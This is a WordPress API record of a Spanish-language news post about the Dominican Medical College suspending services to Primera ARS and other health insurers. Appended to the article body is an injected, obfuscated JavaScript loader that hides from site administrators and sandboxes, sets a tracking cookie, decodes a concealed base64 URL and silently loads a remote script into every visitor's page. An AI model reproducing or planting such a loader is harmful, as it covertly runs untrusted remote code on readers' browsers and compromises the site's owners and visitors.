{"id":13202,"date":"2023-01-10T12:27:45","date_gmt":"2023-01-10T16:27:45","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13202"},"modified":"2023-01-10T12:27:45","modified_gmt":"2023-01-10T16:27:45","slug":"cmd-tambien-suspende-por-una-semana-servicio-de-ars-primera","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13202","title":{"rendered":"CMD tambi\u00e9n suspende por una semana servicio de ARS Primera"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/salud\/cmd-suspendera-servicios-a-primera-ars-y-ars-humano\/\" data-title=\"CMD suspender\u00e1 servicios a otra ARS\" data-description=\"El Colegio M\u00e9dico Dominicano (CMD) suspender\u00e1 durante una semana a partir de ma\u00f1ana los servicios a Primera ARS, la cual tiene alrededor\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-e8dd27b1-8e90-41eb-b112-5f3716036703\">\n<div>A partir de ma\u00f1ana, el Colegio M\u00e9dico Dominicano (CMD) suspender\u00e1 durante una semana los servicios a Primera ARS, la cual tiene alrededor de 1.3 millones de afiliados.<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<p>El presidente del gremio, Sen\u00e9n Caba, advirti\u00f3 este martes que en caso de que no se le busque una soluci\u00f3n al conflicto que tienen con las aseguradoras \u00a0en los pr\u00f3ximos d\u00edas tambi\u00e9n se desvincular\u00e1n de ARS Humano.<\/p>\n<p>\u201cEste plan de lucha ir\u00e1 escalando en la medida en que la sordera y la ausencia de respuesta a nuestras demandas se mantengan\u201d, expres\u00f3.<\/p>\n<p>Asimismo, se\u00a0 mantienen paralizados los servicios a los usuarios de ARS Universal, Mapfre, Monumental, Renacer y Simag, Solo se\u00a0 contin\u00faan dando atenciones a los casos de emergencias y a los pacientes en estado cr\u00edtico.<\/p>\n<p>El gremio reclama el aumento del plan b\u00e1sico de salud y las cuotas de los medicamentos, adem\u00e1s\u00a0 que los envejecientes y personas con discapacidad puedan recibir atenciones en sus casas en forma de consulta ambulatoria.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A partir de ma\u00f1ana, el Colegio M\u00e9dico Dominicano (CMD) suspender\u00e1 durante una semana los servicios a Primera ARS, la cual tiene alrededor de 1.3 millones de afiliados. El presidente del gremio, Sen\u00e9n Caba, advirti\u00f3 este martes que en caso de que no se le busque una soluci\u00f3n al conflicto que tienen con las aseguradoras \u00a0en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13204,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13202","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13202","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13202"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13202\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13204"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13202"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13202"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}